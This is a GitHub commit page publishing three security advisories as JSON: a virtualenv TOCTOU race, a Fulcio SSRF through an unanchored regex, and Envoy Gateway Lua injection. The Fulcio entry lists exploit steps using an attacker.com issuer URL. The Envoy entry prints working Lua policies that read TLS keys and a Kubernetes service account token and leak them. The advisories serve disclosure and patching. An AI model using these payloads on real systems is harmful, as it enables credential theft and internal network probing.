Skip to content

Commit 90a6ca0

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-597g-3phw-6986 GHSA-59jp-pj84-45mr GHSA-xrwg-mqj6-6m22
1 parent 48581e3 commit 90a6ca0

3 files changed

Lines changed: 218 additions & 0 deletions

File tree

advisories/github-reviewed/2026/01/GHSA-597g-3phw-6986/GHSA-597g-3phw-6986.json

Lines changed: 70 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-597g-3phw-6986",
4+
"modified": "2026-01-13T18:45:57Z",
5+
"published": "2026-01-13T18:45:57Z",
6+
"aliases": [
7+
"CVE-2026-22702"
8+
],
9+
"summary": "virtualenv Has TOCTOU Vulnerabilities in Directory Creation",
10+
"details": "## Impact\n\nTOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in `virtualenv` allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations.\n\n**Affected versions:** All versions up to and including 20.36.1\n\n**Affected users:** Any user running `virtualenv` on multi-user systems where untrusted local users have filesystem access to shared temporary directories or where `VIRTUALENV_OVERRIDE_APP_DATA` points to a user-writable location.\n\n**Attack scenarios:**\n- Cache poisoning: Attacker corrupts wheels or Python metadata in the cache\n- Information disclosure: Attacker reads sensitive cached data or metadata\n- Lock bypass: Attacker controls lock file semantics to cause concurrent access violations\n- Denial of service: Lock starvation preventing virtualenv operations\n\n## Patches\n\nThe vulnerability has been patched by replacing check-then-act patterns with atomic `os.makedirs(..., exist_ok=True)` operations.\n\n**Fixed in:** PR #3013\n\n**Versions with the fix:** 20.36.2 and later\n\nUsers should upgrade to version 20.36.2 or later.\n\n## Workarounds\n\nIf you cannot upgrade immediately:\n\n1. Ensure `VIRTUALENV_OVERRIDE_APP_DATA` points to a directory owned by the current user with restricted permissions (mode 0700)\n2. Avoid running `virtualenv` in shared temporary directories where other users have write access\n3. Use separate user accounts for different projects to isolate app_data directories\n\n## References\n\n- GitHub PR: https://github.com/pypa/virtualenv/pull/3013\n- Vulnerability reported by: @tsigouris007\n- CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (TOCTOU)\n- CWE-59: Improper Link Resolution Before File Access",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "virtualenv"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "20.36.1"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22702"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/pypa/virtualenv/pull/3013"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc"
54+
},
55+
{
56+
"type": "PACKAGE",
57+
"url": "https://github.com/pypa/virtualenv"
58+
}
59+
],
60+
"database_specific": {
61+
"cwe_ids": [
62+
"CWE-362",
63+
"CWE-59"
64+
],
65+
"severity": "MODERATE",
66+
"github_reviewed": true,
67+
"github_reviewed_at": "2026-01-13T18:45:57Z",
68+
"nvd_published_at": "2026-01-10T07:16:02Z"
69+
}
70+
}

advisories/github-reviewed/2026/01/GHSA-59jp-pj84-45mr/GHSA-59jp-pj84-45mr.json

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-59jp-pj84-45mr",
4+
"modified": "2026-01-13T18:47:57Z",
5+
"published": "2026-01-13T18:47:57Z",
6+
"aliases": [
7+
"CVE-2026-22772"
8+
],
9+
"summary": "Fulcio is vulnerable to Server-Side Request Forgery (SSRF) via MetaIssuer Regex Bypass",
10+
"details": "# Security Disclosure: SSRF via MetaIssuer Regex Bypass\n\n## Summary\n\nFulcio's `metaRegex()` function uses unanchored regex, allowing attackers to bypass MetaIssuer URL validation and trigger SSRF to arbitrary internal services.\n\nSince the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through [Blind SSRF](https://portswigger.net/web-security/ssrf/blind).\n\n## Impact\n\n- SSRF to cloud metadata (169.254.169.254)\n- SSRF to internal Kubernetes APIs\n- SSRF to any service accessible from Fulcio's network\n- Affects ALL deployments using MetaIssuers\n\n## Patches\n\nUpgrade to v1.8.5.\n\n## Workarounds\n\nNone. If anchors are included in the meta issuer configuration URL, they will be escaped before the regular expression is compiled, not making this a sufficient mitigation. Deployments must upgrade to the latest Fulcio release v1.8.5.\n\n## Affected Code\n\n**File**: `pkg/config/config.go` \n**Function**: `metaRegex()` (lines 143-156)\n\n```go\nfunc metaRegex(issuer string) (*regexp.Regexp, error) {\n quoted := regexp.QuoteMeta(issuer)\n replaced := strings.ReplaceAll(quoted, regexp.QuoteMeta(\"*\"), \"[-_a-zA-Z0-9]+\")\n return regexp.Compile(replaced) // Missing ^ and $ anchors\n}\n```\n\n## The Bug\n\nThe regex has no `^` (start) or `$` (end) anchors. Go's `regexp.MatchString()` does substring matching, so:\n\n```\nPattern: https://oidc.eks.*.amazonaws.com/id/*\nRegex: https://oidc\\.eks\\.[-_a-zA-Z0-9]+\\.amazonaws\\.com/id/[-_a-zA-Z0-9]+\n\nInput: https://attacker.com/x/https://oidc.eks.foo.amazonaws.com/id/bar\nResult: MATCHES (substring found)\n```\n\n## Exploit\n\n1. Attacker sends JWT with `iss` claim: `https://attacker.com/path/https://oidc.eks.x.amazonaws.com/id/y`\n2. Fulcio's `GetIssuer()` matches this against MetaIssuer patterns\n3. Unanchored regex matches the embedded pattern as substring\n4. Fulcio calls `oidc.NewProvider()` with attacker's URL\n5. HTTP request goes to `attacker.com`, not `amazonaws.com`\n6. Attacker returns OIDC discovery with `jwks_uri` pointing to internal service\n7. Fulcio fetches from internal service → SSRF",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/sigstore/fulcio"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.8.5"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.8.4"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/sigstore/fulcio/security/advisories/GHSA-59jp-pj84-45mr"
45+
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22772"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/sigstore/fulcio/commit/eaae2f2be56df9dea5f9b439ec81bedae4c0978d"
53+
},
54+
{
55+
"type": "PACKAGE",
56+
"url": "https://github.com/sigstore/fulcio"
57+
}
58+
],
59+
"database_specific": {
60+
"cwe_ids": [
61+
"CWE-918"
62+
],
63+
"severity": "MODERATE",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2026-01-13T18:47:57Z",
66+
"nvd_published_at": "2026-01-12T21:15:59Z"
67+
}
68+
}

advisories/github-reviewed/2026/01/GHSA-xrwg-mqj6-6m22/GHSA-xrwg-mqj6-6m22.json

Lines changed: 80 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,80 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-xrwg-mqj6-6m22",
4+
"modified": "2026-01-13T18:47:34Z",
5+
"published": "2026-01-13T18:47:34Z",
6+
"aliases": [
7+
"CVE-2026-22771"
8+
],
9+
"summary": "Envoy Extension Policy lua scripts injection causes arbitrary command execution",
10+
"details": "### Impact\nEnvoy Gateway allows users to create Lua scripts that are executed by Envoy proxy using the `EnvoyExtensionPolicy` resource. Administrators can use Kubernetes RBAC to grant users the ability to create `EnvoyExtensionPolicy` resources. Lua scripts in policies are executed in two contexts:\n* An `EnvoyExtensionPolicy` can be attached to Gateway and xRoute resources. Lua scripts in the policy will process traffic in that scope.\n* Lua scripts are interpreted and run by the Envoy Gateway controller pod for validation purposes. \n\nLua scripts executed by Envoy proxy can be used to leak the proxy's credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication. \n\nFor example, the following EnvoyExtensionPolicy, when executed by Envoy proxy, will leak the proxy's XDS client certificates. \n\n```yaml\napiVersion: gateway.envoyproxy.io/v1alpha1\nkind: EnvoyExtensionPolicy\nmetadata:\n name: lua-leak\nspec:\n targetRefs:\n - group: gateway.networking.k8s.io\n kind: HTTPRoute\n name: leak\n lua:\n - type: Inline\n inline: |\n function envoy_on_response(response_handle)\n local cert = io.open(\"/certs/tls.crt\", \"r\")\n local content\n if cert then\n content = cert:read(\"*all\")\n cert:close()\n else\n content = \"file-not-found\"\n end\n local keyfile = io.open(\"/certs/tls.key\", \"r\")\n local contentkey\n if keyfile then\n contentkey = keyfile:read(\"*all\")\n keyfile:close()\n else\n contentkey = \"file-not-found\"\n end\n local keypair = contentkey .. \"\\n\" .. content\n response_handle:body():setBytes(keypair)\n response_handle:headers():replace(\"content-length\", tostring(#keypair))\n response_handle:headers():replace(\"content-type\", \"text/plain\")\n end\n```\n\nThis execution can lead to arbitrary code execution in the Envoy Gateway controller pod. Attackers can leverage this to achieve privilege escalation. For example, the following `EnvoyExtensionPolicy` will read the Envoy Gateway K8s service account token and return it in an error which will be displayed in the resource status. \n\n```yaml\napiVersion: gateway.envoyproxy.io/v1alpha1\nkind: EnvoyExtensionPolicy\nmetadata:\n name: lua-leak\nspec:\n targetRefs:\n - group: gateway.networking.k8s.io\n kind: HTTPRoute\n name: backend\n lua:\n - type: Inline\n inline: |\n function envoy_on_response(response_handle)\n local token = io.open(\"/var/run/secrets/kubernetes.io/serviceaccount/token\", \"r\")\n local content\n if token then\n content = token:read(\"*all\")\n token:close()\n else\n content = \"file-not-found\"\n end\n io.write(content)\n error(content)\n end\n```\n\nResults in:\n\n```yaml\napiVersion: gateway.envoyproxy.io/v1alpha1\nkind: EnvoyExtensionPolicy\nmetadata:\n name: lua-leak\n[...]\nstatus:\n ancestors:\n - ancestorRef:\n group: gateway.networking.k8s.io\n kind: Gateway\n name: eg\n namespace: default\n conditions:\n - lastTransitionTime: \"...\"\n message: \"Lua: validation failed for lua body in policy with name envoyextensionpolicy/default/lua-leak/lua/0:\n failed to validate with envoy_on_response: <string>:622: [REDACTED TOKEN]\\nstack\n traceback:\\n\\t[G]: in function 'error'\\n\\t<string>:622: in function 'envoy_on_response'\\n\\t<string>:625:\n in main chunk\\n\\t[G]: ?.\"\n```\n\nAttackers can then use this token to steal other secrets, run arbitrary pods in the envoy-gateway-system namespace and delete Envoy Gateway itself. \n\n### Patches\nThe patch sets secure defaults and addresses lack of guardrails allowing arbitrary Lua execution:\n* Runs Lua `Strict` validation by default in Envoy Gateway along with a security hardening module. This module blocks dangerous Lua code that may be executed in proxy and controller pods.\n* Renamed `Syntax` to `InsecureSyntax` validation mode to signify that in this validation mode Lua won't be validated for possible security gaps.\n* Supports a new `disableLua` option in EnvoyProxy that rejects EnvoyExtenstionPolicies with Lua scripts entirely, blocking the option to execute arbitrary Lua code.\n\n### Workarounds\nEnvoy Gateway users can create Kubernetes RBAC rules (see [docs](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)) that apply on EnvoyExtensionPolicy resources to restrict creation of these Lua policies to trusted namespaces. Note that this restriction will apply to all EnvoyExtensionPolicies, regardless of the extensibility option that is used (Lua, Wasm or Ext-Proc).",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/envoyproxy/gateway"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "1.6.0-rc.0"
29+
},
30+
{
31+
"fixed": "1.6.2"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Go",
40+
"name": "github.com/envoyproxy/gateway"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "0"
48+
},
49+
{
50+
"fixed": "1.5.7"
51+
}
52+
]
53+
}
54+
]
55+
}
56+
],
57+
"references": [
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/envoyproxy/gateway/security/advisories/GHSA-xrwg-mqj6-6m22"
61+
},
62+
{
63+
"type": "ADVISORY",
64+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22771"
65+
},
66+
{
67+
"type": "PACKAGE",
68+
"url": "https://github.com/envoyproxy/gateway"
69+
}
70+
],
71+
"database_specific": {
72+
"cwe_ids": [
73+
"CWE-94"
74+
],
75+
"severity": "HIGH",
76+
"github_reviewed": true,
77+
"github_reviewed_at": "2026-01-13T18:47:34Z",
78+
"nvd_published_at": "2026-01-12T19:16:03Z"
79+
}
80+
}

0 commit comments

Comments
 (0)